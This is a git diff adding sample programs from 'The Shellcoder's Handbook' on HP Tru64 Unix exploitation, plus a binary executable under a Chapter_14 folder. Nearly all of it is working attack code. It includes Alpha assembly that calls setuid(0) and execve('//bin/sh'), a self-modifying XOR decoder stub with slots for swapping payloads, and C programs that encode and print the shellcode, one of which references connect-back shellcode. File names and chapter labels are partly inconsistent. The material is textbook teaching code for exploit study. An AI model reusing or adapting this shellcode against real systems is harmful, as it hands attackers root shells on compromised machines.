diff --git a/Chapter_12/Shellcoders12sampleprogram02.txt b/Chapter_12/Shellcoders12sampleprogram02.txt
new file mode 100644
index 0000000..e610e58
--- /dev/null
+++ b/Chapter_12/Shellcoders12sampleprogram02.txt
@@ -0,0 +1,27 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 12: HP Tru64 Unix Exploitation
+Sample Program #2
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+
+#include <alpha/regdef.h>
+#include <alpha/pal.h>
+     .text
+     .arch     generic
+     .align 4
+     .globl  main
+     .ent      main
+main:
+     bis  zero, zero, a0       #argument to setuid(), uid=0
+     addq zero, 0x17, v0       #setuid system call number.
+     PAL_callsys               #trap to kernel mode.
diff --git a/Chapter_12/Shellcoders12sampleprogram03.c b/Chapter_12/Shellcoders12sampleprogram03.c
new file mode 100644
index 0000000..5fcf165
--- /dev/null
+++ b/Chapter_12/Shellcoders12sampleprogram03.c
@@ -0,0 +1,64 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 13: HP Tru64 Unix Exploitation
+Sample Program #3
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+
+#include <alpha/regdef.h>
+#include <alpha/pal.h>
+        .text
+        .arch   generic
+        .align 4
+        .globl  main
+        .ent    main
+main:
+        .frame  $sp, 0, $26
+
+        lda  a0, -1000(sp)     #GetPC code we have just covered.
+back:
+        bis  zero, 0x86, a1      #a1 equals to 0x00000086 which is the imb instructio
+               #imb instruction syncs the instruction cache thus make it
+                                  #coherent with main memory.
+
+               #1st run: store imb instruction in sp - 1000 stack.
+        stl  a1, -4(a0)           #2nd run: overwrite the following bsr instruction with imb.
+        addq a0, 48, a2
+        stl  a1, -4(a2)           #also overwrite the 0x41414141 with the imb instruction
+                                  #thus avoiding i-cache incoherency af-ter the decode process
+                                  #since imb instruction also have NULL bytes this is the only                                            #way to avoid NULL bytes in decoder loop.
+
+        bsr  a0, back             #branch the label back saving pc in a0 register.
+                                  #on the second run bsr will be over-written with nop.
+                                  #execution will continue with the next instruction.
+        addq a0, 52, a4     #offset to xored data plus four.
+        addq zero, 212, a3     #size of xored data in bytes. !!CHANGE HERE!!
+        addq a0, 264, a5          #offset to xor key; equals to xordata size plus 52. !CHANGE!
+        addq a0, 48, a0           #a0 should point to the first instruc-tion of the xored data
+                                  #real shellcode should be expecting it this way.
+
+        ldl  a1, -4(a5)           #load the xor key.
+xorloop:
+        ldl  a2, -4(a4)           #load a single long from the xored data.
+        xor  a2, a1, a2           #xor/decrypt the long.
+        stl  a2, -4(a4)           #store the long back into its loca-tion.
+        subq a3, 4, a3            #decrement counter.
+        addq a4, 4, a4            #increment xored data pointer, move to next long.
+        bne  a3, xorloop          #branch back to xorloop till counter is zero.
+.long   0x41414141                #this long will be overwriten with the imb instruction. 
+               #flush I-cache.
+
+               #xored data starts here. Place the real shellcode encoded with 
+               #the following XOR key. !!CHANGE HERE!!
+
+.long   0x88888888                #XOR key. !!CHANGE HERE if necessary!!
+        .end    main
diff --git a/Chapter_12/Shellcoders12sampleprogram03.txt b/Chapter_12/Shellcoders12sampleprogram03.txt
new file mode 100644
index 0000000..5c00f46
--- /dev/null
+++ b/Chapter_12/Shellcoders12sampleprogram03.txt
@@ -0,0 +1,64 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 13: HP Tru64 Unix Exploitation
+Sample Program #3
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+
+#include <alpha/regdef.h>
+#include <alpha/pal.h>
+        .text
+        .arch   generic
+        .align 4
+        .globl  main
+        .ent    main
+main:
+        .frame  $sp, 0, $26
+
+        lda  a0, -1000(sp)        #GetPC code we have just covered.
+back:
+        bis  zero, 0x86, a1       #a1 equals to 0x00000086 which is the imb instructio
+                                  #imb instruction syncs the instruction cache thus make it
+                                  #coherent with main memory.
+
+                                  #1st run: store imb instruction in sp - 1000 stack.
+        stl  a1, -4(a0)           #2nd run: overwrite the following bsr instruction with imb.
+        addq a0, 48, a2
+        stl  a1, -4(a2)           #also overwrite the 0x41414141 with the imb instruction
+                                  #thus avoiding i-cache incoherency af-ter the decode process
+                                  #since imb instruction also have NULL bytes this is the only                              #way to avoid NULL bytes in decoder loop.
+
+        bsr  a0, back             #branch the label back saving pc in a0 register.
+                                  #on the second run bsr will be over-written with nop.
+                                  #execution will continue with the next instruction.
+        addq a0, 52, a4           #offset to xored data plus four.
+        addq zero, 212, a3        #size of xored data in bytes. !!CHANGE HERE!!
+        addq a0, 264, a5          #offset to xor key; equals to xordata size plus 52. !CHANGE!
+        addq a0, 48, a0           #a0 should point to the first instruc-tion of the xored data
+                                  #real shellcode should be expecting it this way.
+
+        ldl  a1, -4(a5)           #load the xor key.
+xorloop:
+        ldl  a2, -4(a4)           #load a single long from the xored data.
+        xor  a2, a1, a2           #xor/decrypt the long.
+        stl  a2, -4(a4)           #store the long back into its loca-tion.
+        subq a3, 4, a3            #decrement counter.
+        addq a4, 4, a4            #increment xored data pointer, move to next long.
+        bne  a3, xorloop          #branch back to xorloop till counter is zero.
+.long   0x41414141                #this long will be overwriten with the imb instruction. 
+                                  #flush I-cache.
+
+                                  #xored data starts here. Place the real shellcode encoded with 
+                                  #the following XOR key. !!CHANGE HERE!!
+
+.long   0x88888888                #XOR key. !!CHANGE HERE if necessary!!
+        .end    main
diff --git a/Chapter_12/Shellcoders12sampleprogram04.c b/Chapter_12/Shellcoders12sampleprogram04.c
new file mode 100644
index 0000000..fe66be1
--- /dev/null
+++ b/Chapter_12/Shellcoders12sampleprogram04.c
@@ -0,0 +1,64 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 13: HP Tru64 Unix Exploitation
+Sample Program #4
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+
+#include <alpha/regdef.h>
+#include <alpha/pal.h>
+        .text
+        .arch   generic
+        .align 4
+        .globl  main
+        .ent    main
+main:
+        .frame  $sp, 0, $26
+
+        lda  a0, -1000(sp)       #GetPC code we have just covered.
+back:
+        bis  zero, 0x86, a1      #a1 equals to 0x00000086 which is the imb instructio
+                                 #imb instruction syncs the instruction cache thus make it
+                                 #coherent with main memory.
+
+                                 #1st run: store imb instruction in sp - 1000 stack.
+        stl  a1, -4(a0)          #2nd run: overwrite the following bsr instruction with imb.
+        addq a0, 48, a2
+        stl  a1, -4(a2)          #also overwrite the 0x41414141 with the imb instruction
+                                 #thus avoiding i-cache incoherency af-ter the decode process
+                                 #since imb instruction also have NULL bytes this is the only                             #way to avoid NULL bytes in decoder loop.
+
+        bsr  a0, back            #branch the label back saving pc in a0 register.
+                                 #on the second run bsr will be over-written with nop.
+                                 #execution will continue with the next instruction.
+        addq a0, 52, a4          #offset to xored data plus four.
+        addq zero, 212, a3       #size of xored data in bytes. !!CHANGE HERE!!
+        addq a0, 264, a5         #offset to xor key; equals to xordata size plus 52. !CHANGE!
+        addq a0, 48, a0          #a0 should point to the first instruc-tion of the xored data
+                                 #real shellcode should be expecting it this way.
+
+        ldl  a1, -4(a5)          #load the xor key.
+xorloop:
+        ldl  a2, -4(a4)          #load a single long from the xored data.
+        xor  a2, a1, a2          #xor/decrypt the long.
+        stl  a2, -4(a4)          #store the long back into its loca-tion.
+        subq a3, 4, a3           #decrement counter.
+        addq a4, 4, a4           #increment xored data pointer, move to next long.
+        bne  a3, xorloop         #branch back to xorloop till counter is zero.
+.long   0x41414141               #this long will be overwriten with the imb instruction. 
+               	                 #flush I-cache.
+
+                                 #xored data starts here. Place the real shellcode encoded with 
+                                 #the following XOR key. !!CHANGE HERE!!
+
+.long   0x88888888               #XOR key. !!CHANGE HERE if necessary!!
+        .end    main
diff --git a/Chapter_12/Shellcoders12sampleprogram04.txt b/Chapter_12/Shellcoders12sampleprogram04.txt
new file mode 100644
index 0000000..53107bf
--- /dev/null
+++ b/Chapter_12/Shellcoders12sampleprogram04.txt
@@ -0,0 +1,46 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 13: HP Tru64 Unix Exploitation
+Sample Program #4
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+
+#include <alpha/regdef.h>
+#include <alpha/pal.h>
+     .text
+     .arch     generic
+     .align 4
+     .globl  main
+     .ent      main
+main:
+     .frame  $sp, 0, $26
+                                    #always assume that current location is in a0 regis-ter,
+                                    #it is the responsibility  of the decoder to pass the
+                                    #current Program Counter to us.
+     bic  sp, 0xf, sp               #make sure tha stack is 16 byte aligned.
+     addq a0, 0x30, s4              #address of //bin/sh
+     stq  s4, (sp)                  #store address of //bin/sh
+     stq  zero, 8(sp)               #store the NULL terminator.
+     
+     bis  zero, zero, a0            #uid=0, first argument.
+     addq zero, 0x17, v0            #setuid syscall.
+     PAL_callsys                    #trap to kernel.
+
+     mov  s4, a0                    #address of //bin/sh
+     mov  sp, a1                    #address that points to (address of //bin/sh).
+     bis  zero, zero, a2            #NULL.
+             addq zero, 0x3b, v0    #execve syscall
+     PAL_callsys                    #trap to kernel.
+
+.quad   0x68732f6e69622f2f          #/bin/sh\x00
+.long   0x00000000
+     .end      main
diff --git a/Chapter_12/Shellcoders12sampleprogram05.txt b/Chapter_12/Shellcoders12sampleprogram05.txt
new file mode 100644
index 0000000..2f7473a
--- /dev/null
+++ b/Chapter_12/Shellcoders12sampleprogram05.txt
@@ -0,0 +1,44 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 13: HP Tru64 Unix Exploitation
+Sample Program #5
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+
+unsigned int shellcode[] = 
+{
+0x47c1f11e,
+0x4206140d,
+0xb5be0000,
+0x43e2f400,
+0xb7fe0008,
+0x47ff0410,
+0x00000083,
+0x47de0411,
+0x45ad0410,
+0x47ff0412,
+0x43e77400,
+0x00000083,
+0x69622f2f,
+0x68732f6e,
+0x00000000
+};
+
+int
+main()
+{
+    int i;
+
+     //printf("sizeof shellcode %d\n", sizeof(shellcode));
+     for(i =0 ; i < sizeof(shellcode)/4; i++)
+           printf(".long\t0x%.8x\n", shellcode[i] ^= 0x88888888);
+}
diff --git a/Chapter_12/Shellcoders12sampleprogram06.txt b/Chapter_12/Shellcoders12sampleprogram06.txt
new file mode 100644
index 0000000..0571148
--- /dev/null
+++ b/Chapter_12/Shellcoders12sampleprogram06.txt
@@ -0,0 +1,78 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 13: HP Tru64 Unix Exploitation
+Sample Program #6
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+
+#include <alpha/regdef.h>
+#include <alpha/pal.h>
+        .text
+        .arch   generic
+        .align 4
+        .globl  main
+        .ent    main
+main:
+        .frame  $sp, 0, $26
+
+        lda  a0, -1000(sp)     #GetPC code we have just covered.
+back:
+        bis  zero, 0x86, a1      #a1 equals to 0x00000086 which is the imb instructio
+               #imb instruction syncs the instruction cache thus make it
+                                  #coherent with main memory.
+
+               #1st run: store imb instruction in sp - 1000 stack.
+        stl  a1, -4(a0)           #2nd run: overwrite the following bsr instruction with imb.
+        addq a0, 48, a2
+        stl  a1, -4(a2)           #also overwrite the 0x41414141 with the imb instruction
+                                  #thus avoiding i-cache incoherency af-ter the decode process
+                                  #since imb instruction also have NULL bytes this is the only                                            #way to avoid NULL bytes in decoder loop.
+
+        bsr  a0, back             #branch the label back saving pc in a0 register.
+                                  #on the second run bsr will be over-written with nop.
+                                  #execution will continue with the next instruction.
+        addq a0, 52, a4     #offset to xored data plus four.
+        addq zero, 60, a3     #size of xored data in bytes. 
+               #Changed according to the size of the setuid+execve pay-load
+
+        addq a0, 112, a5          #offset to xor key; equals to xordata size plus 52.
+        addq a0, 48, a0           #a0 should point to the first instruc-tion of the xored data
+                                  #real shellcode should be expecting it this way.
+
+        ldl  a1, -4(a5)           #load the xor key.
+xorloop:
+        ldl  a2, -4(a4)           #load a single long from the xored data.
+        xor  a2, a1, a2           #xor/decrypt the long.
+        stl  a2, -4(a4)           #store the long back into its loca-tion.
+        subq a3, 4, a3            #decrement counter.
+        addq a4, 4, a4            #increment xored data pointer, move to next long.
+        bne  a3, xorloop          #branch back to xorloop till counter is zero.
+.long   0x41414141                #this long will be overwriten with the imb instruction. 
+               #flush I-cache.
+.long   0xcf497996
+.long   0xca8e9c85
+.long   0x3d368888
+.long   0xcb6a7c88
+.long   0x3f768880
+.long   0xcf778c98
+.long   0x8888880b
+.long   0xcf568c99
+.long   0xcd258c98
+.long   0xcf778c9a
+.long   0xcb6ffc88
+.long   0x8888880b
+.long   0xe1eaa7a7
+.long   0xe0fba7e6
+.long   0x88888888
+
+.long   0x88888888                #XOR key.
+        .end    main
diff --git a/Chapter_12/Shellcoders12sampleprogram07.txt b/Chapter_12/Shellcoders12sampleprogram07.txt
new file mode 100644
index 0000000..4b336e3
--- /dev/null
+++ b/Chapter_12/Shellcoders12sampleprogram07.txt
@@ -0,0 +1,72 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 13: HP Tru64 Unix Exploitation
+Sample Program #7
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+
+unsigned int shellcode[] = 
+{
+0x221efc18,
+0x42061412,
+0x47f0d411,
+0xb230fffc,
+0xb232fffc,
+0xd21ffffb,
+0x420e1415,
+0x42069414,
+0x43e79413,
+0xa235fffc,
+0x42061410,
+0xa254fffc,
+0x42609533,
+0x46510812,
+0xb254fffc,
+0x42809414,
+0xf67ffffa,
+0x41414141,
+0xcf497996,
+0xca8e9c85,
+0x3d368888,
+0xcb6a7c88,
+0x3f768880,
+0xcf778c98,
+0x8888880b,
+0xcf568c99,
+0xcd258c98,
+0xcf778c9a,
+0xcb6ffc88,
+0x8888880b,
+0xe1eaa7a7,
+0xe0fba7e6,
+0x88888888,
+0x88888888
+};
+
+
+int
+main()
+{
+     unsigned char buf[sizeof(shellcode)+1];
+     int i;
+     
+     printf("sizeof shellcode %d\n", sizeof(xor_connbacksc));
+     memcpy(buf, shellcode, sizeof(shellcode));
+
+     for(i =0 ; i < sizeof(shellcode); i++) {
+          if( !((i) % 4))
+               printf("\"\n\"");
+          printf("\\x%.2x", buf[i]);
+     }
+     printf("\n");
+}
+
diff --git a/Chapter_14/bin/RIOT.exe b/Chapter_14/bin/RIOT.exe
new file mode 100644
index 0000000000000000000000000000000000000000..8d8d45fbddff83820338f28da1181955dad7cd35
GIT binary patch
literal 184436
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
